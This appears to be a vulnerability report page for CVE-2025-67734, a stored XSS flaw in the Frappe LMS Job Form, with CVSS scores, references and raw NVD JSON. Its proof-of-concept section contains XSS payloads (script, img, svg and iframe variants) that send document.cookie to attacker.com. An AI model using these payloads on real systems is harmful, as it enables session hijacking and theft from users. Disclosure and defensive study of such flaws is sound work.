Security Vulnerability Report
CVE-2025-67734 CVSS 5.4 MEDIUM

CVE-2025-67734

Published: 2025-12-12 20:15:43
Last Modified: 2025-12-16 21:34:55

Description

Frappe Learning Management System (LMS) is a learning system that helps users structure their content. Versions prior to 2.42.0 allowed authenticated attackers to enter JavaScript through the Company Website field of the Job Form, exposing users to an XSS attack. The script could then be executed in the browsers of users who opened the malicious job posting. This issue is fixed in version 2.42.0.

CVSS Details

CVSS Score: 5.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:frappe:learning:*:*:*:*:*:*:*:* - VULNERABLE
Frappe LMS < 2.42.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-67734 Stored XSS PoC
// Target: Frappe LMS Job Form
// Attack Vector: Company Website field injection

// Step 1: Authenticate with low-privilege account
const credentials = {
  usr: '[email protected]',
  password: 'password123'
};

// Step 2: Submit Job Form with XSS payload in Company Website field
const jobFormPayload = {
  job_title: 'Software Engineer',
  company_name: 'Legitimate Company',
  company_website: '<script>\n fetch("https://attacker.com/steal?cookie=" + document.cookie)\n</script>',
  job_description: 'Job description here',
  job_type: 'full-time'
};

// Step 3: When victim views the job posting, XSS executes
// Payload steals victim cookies and sends to attacker server

// Alternative payloads:
// <img src=x onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)">
// <svg onload="fetch('https://attacker.com/steal?cookie='+document.cookie)">
// <iframe src="javascript:fetch('https://attacker.com/steal?cookie='+document.cookie)">

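References

https://github.com/frappe/lms/commit/ca849da81558066d7614b9b6234004ff59c90632 (Patch)
https://github.com/frappe/lms/security/advisories/GHSA-c495-qg4v-5vr7 (Third Party Advisory)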

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-67734", "sourceIdentifier": "[email protected]", "published": "2025-12-12T20:15:42.623", "lastModified": "2025-12-16T21:34:55.120", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Frappe Learning Management System (LMS) is a learning system that helps users structure their content. Versions prior to 2.42.0 allowed authenticated attackers to enter JavaScript through the Company Website field of the Job Form, exposing users to an XSS attack. The script could then be executed in the browsers of users who opened the malicious job posting. This issue is fixed in version 2.42.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": 
"NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:frappe:learning:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.0.0", "versionEndExcluding": "2.42.0", "matchCriteriaId": "E8908A38-7B64-4B77-9423-86532826C317"}]}]}], "references": [{"url": "https://github.com/frappe/lms/commit/ca849da81558066d7614b9b6234004ff59c90632", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/frappe/lms/security/advisories/GHSA-c495-qg4v-5vr7", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}